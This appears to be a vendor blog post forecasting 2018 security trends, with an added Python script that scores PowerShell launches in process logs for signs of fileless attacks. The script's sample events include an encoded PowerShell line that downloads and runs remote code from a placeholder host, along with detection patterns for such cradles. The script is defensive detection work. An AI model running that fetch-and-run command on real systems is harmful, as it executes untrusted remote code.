When thinking about security trends, 2017 was a banner year for cybercrime:
- Yahoo announced the largest known breach in history, which affected all of its 3 billion users (approximately half the world’s estimated population)
- Equifax confirmed that it had been breached, and that about half of all Americans had their personally identifiable information compromised
- Cutting-edge strains of ransomware—WannaCry and NotPetya—cost the global economy hundreds of millions of dollars
- Researchers discovered “KRACK,” a dangerous Wi-Fi exploit of the WPA2 standard
And that barely skims the surface of last year’s cyber-treachery. But 2018 is already here, and that means it’s time to set our sights on the year ahead.
Here’s what security trends we expect to see in the next 12 months:
1. Another Spike in Ransomware Attacks
In 2016, the world gasped as ransomware raked in approximately $1 billion. In 2017, that figure rocketed to an estimated $5 billion. If this trend continues, we can expect 2018 to be ransomware’s best/worst year to date. In fact, by 2019, Cybersecurity Ventures predicts ransomware damages to exceed $11 billion.
Some key trends that will contribute to ransomware’s rapid growth through 2018 and beyond include:
- Phishing attacks will become increasingly sophisticated
- Cryptocurrency’s growth will improve hackers’ ability to remain untraceable as they collect ransoms
- Ransomware will target the cloud more heavily
- Hackers will weaponize AI and other advanced tactics to more accurately predict the value of encrypted assets, and to improve their abilities to identify and leverage zero-day ransomware
The last trend is particularly worrisome, and will require advanced anomaly detection capabilities to stay protected.
2. IoT Will Be a Core Attack Vector
The Internet of Things is already bringing convenience to consumers and process optimization to businesses, but it comes at a cost. According to Information Age, IoT may in fact be the “security crisis of 2018.” Every new endpoint is a new attack vector, and IoT has proven vulnerable in the past (e.g., the Mirai botnet army in late 2016).
In a recent webinar, Arctic Wolf Networks’ Chief Architect Matthew Thurston explained the dangers of the rising threat of botnets in general, and IoT devices are part of that picture. Hackers can steal these devices’ IP addresses and then use them to spam businesses or to build powerful botnet armies for DDoS.
Universally, better endpoint security and proper password protection will be needed to protect the IoT. But to defend your business, you’ll need to inspect network connections between systems more closely than ever before. The IoT is a gateway to DDoS, ransomware (just imagine an entire manufacturing facility taken offline) and other more advanced forms of network intrusion.
3. GDPR’s Impact Will Resonate Globally
This is part prediction, part statement of fact, and will impact all companies doing business in Europe. Starting May 25, the General Data Protection Regulation will require all organizations that process or store data originating in an EU member state to abide by a strict new set of standards. These include, but aren’t limited to, the following:
- Businesses must appoint a data protection officer responsible for ensuring the organization stores and processes EU member state data in compliance with GDPR
- Personal data must not be gathered without an EU citizen’s consent
- Every EU citizen has the right to be forgotten, meaning they may request the data holder to erase all data pertaining to them
- Data protection impact assessments (DPIA) that identify, assess and mitigate data privacy and security risks will be mandatory
- Breach notifications must be issued within 72 hours of detection
- Unauthorized data transfers outside member states will be subject to penalties
Failing to adhere to any of GDPR’s core measures may result in a fine of €20 million (~$24.5 million), or 4 percent of annual worldwide turnover of the preceding financial year (whichever is greater). This puts pressure on security operations teams worldwide to employ thorough due diligence as they protect EU member-state data.
4. Fileless Malware Continues Its Explosive Growth
Fileless malware, also known as “zero-footprint” or “non-malware” attacks, exploded onto the criminal-hacking scene in 2017. These elusive threats don’t need to install new software on an endpoint to infect it; instead, they run entirely in memory. In other words, fileless attacks leverage tools that are native to the operating system—particularly PowerShell and Windows Management Instrumentation (WMI)—to carry out the attack.
Consequently, traditional anti-virus and application whitelisting tools struggle to detect them. Distinguishing between a malicious and a legitimate PowerShell execution, for instance, is incredibly complex and requires deeper context about the specific behaviors involved: which process launched it, with what arguments, and what the script actually does.
Unfortunately, the Ponemon Institute estimated that more than half of all attacks against businesses in 2017 were fileless. We can all but guarantee that this percentage will increase in 2018.
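The difficulty described above is that a PowerShell launch is only suspicious in context. The following is an added example written for this article (not Arctic Wolf’s code or product logic): a small triage routine that scores process-creation records by combining command-line signals with the identity of the parent process, and that decodes any -EncodedCommand payload so the inspection also sees the script hidden behind it. The pipe-delimited log format, the signal names and weights, the alert threshold and every sample event are constructed assumptions; the field set mirrors what a Sysmon Event ID 1 or Windows event 4688 record carries.

```python
"""Context-aware triage of PowerShell launches from process-creation logs.

Added example, not Arctic Wolf's code. The log format below is a constructed,
pipe-delimited stand-in for the fields a Sysmon Event ID 1 or Windows 4688
record carries: timestamp|host|user|parent image|image|command line.
Signal names, weights and the alert threshold are illustrative assumptions.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Command-line signals (name, pattern, weight). None is conclusive on its own;
# the score only becomes meaningful when several coincide or the parent is odd.
COMMAND_SIGNALS = [
    ("encoded_command",    re.compile(r"-e(?:nc\w*|c)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window",      re.compile(r"-w\w*\s+hidden", re.I), 2),
    ("bypass_policy",      re.compile(r"-ex\w*\s+bypass", re.I), 2),
    ("download_cradle",    re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), 3),
    ("invoke_expression",  re.compile(r"\biex\b|invoke-expression", re.I), 2),
    ("wmi_process_create", re.compile(r"win32_process|invoke-wmimethod|wmic\b.*\bprocess\s+call\s+create", re.I), 3),
]

# Parent-process context: document readers and script hosts rarely need a shell;
# WmiPrvSE.exe as parent means the launch arrived via WMI, often from another host.
UNUSUAL_PARENTS = {"winword.exe": 4, "excel.exe": 4, "outlook.exe": 4,
                   "acrord32.exe": 4, "mshta.exe": 4, "wscript.exe": 4,
                   "wmiprvse.exe": 3}
ALERT_THRESHOLD = 5  # assumption: tune against your own environment's baseline


@dataclass
class Finding:
    host: str
    user: str
    parent: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded: str = ""  # plaintext behind -EncodedCommand, if any

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def decode_encoded_command(cmdline: str) -> str:
    """Recover the UTF-16LE script behind -EncodedCommand ('' if absent or invalid)."""
    m = re.search(r"-e(?:nc\w*|c)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_event(line: str) -> Optional[Finding]:
    """Score one process-creation record; returns None for non-PowerShell images."""
    _ts, host, user, parent, image, cmdline = line.split("|", 5)
    if image.lower() not in {"powershell.exe", "pwsh.exe"}:
        return None
    f = Finding(host=host, user=user, parent=parent)
    f.decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + f.decoded  # inspect the decoded script as well
    for name, pattern, weight in COMMAND_SIGNALS:
        if pattern.search(text):
            f.score += weight
            f.reasons.append(name)
    parent_weight = UNUSUAL_PARENTS.get(parent.lower())
    if parent_weight:
        f.score += parent_weight
        f.reasons.append("unusual_parent:" + parent.lower())
    return f


def triage_log(lines: List[str]) -> List[Finding]:
    """Return only the findings that cross the alert threshold."""
    findings = (triage_event(line) for line in lines)
    return [f for f in findings if f is not None and f.alert]


# Constructed sample events (no real hosts, users or URLs).
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    # Admin running an inventory script from the desktop: one weak signal only.
    "2018-01-15T09:12:03Z|WS-017|CORP\\itadmin|explorer.exe|powershell.exe|"
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\Get-Inventory.ps1",
    # Word spawning a hidden, encoded PowerShell that fetches and runs remote code.
    "2018-01-15T09:14:41Z|WS-042|CORP\\jsmith|winword.exe|powershell.exe|"
    "powershell.exe -NoP -NonI -W Hidden -Enc " + _ENCODED,
    # PowerShell launched through WMI, itself creating a process via Win32_Process.
    "2018-01-15T09:20:55Z|SRV-003|CORP\\svc_backup|wmiprvse.exe|powershell.exe|"
    "powershell.exe -nop -c \"Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'notepad.exe'\"",
    # Unrelated process: ignored by the triage.
    "2018-01-15T09:21:10Z|WS-017|CORP\\itadmin|explorer.exe|notepad.exe|notepad.exe C:\\notes.txt",
]

if __name__ == "__main__":
    for finding in triage_log(SAMPLE_EVENTS):
        print(f"{finding.host} {finding.user} parent={finding.parent} "
              f"score={finding.score} reasons={finding.reasons}")
        if finding.decoded:
            print("  decoded:", finding.decoded)
```

Run as a script, the admin’s `-ExecutionPolicy Bypass -File` launch scores 2 and stays below the threshold, while the hidden, encoded launch from Word scores 14 and the WMI-spawned launch scores 6, both raising alerts. No single flag decides the outcome; the combination of arguments, decoded script content and parent process is the “deeper context” the paragraph above refers to. In production, PowerShell script block logging (event ID 4104) supplies the decoded script directly, which removes the need to recover it from the command line.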
5. Hybrid AI Will Shine Brightly in a Dark Threat Landscape
With fileless attacks, advanced persistent threats and ransomware backed by machine learning all looming on the horizon, the need for deeper, contextual security monitoring has never been so urgent.
Machine learning can provide much of this context by sifting through enormous batches of log data far faster than human analysts can. It’s not surprising, then, that the AI-based security market is growing at a compound annual growth rate of over 31 percent.
But as pointed out during AWN’s webinar “Hybrid-AI: Boost Cybersecurity with Human Augmented Machine Learning,” security analysts will need to interpret the actions of AI, and provide a continuous feedback loop to improve threat detection and response. AI is a powerful cyberthreat detection resource but, for now and the foreseeable future, it requires the tribal knowledge of an experienced security analyst.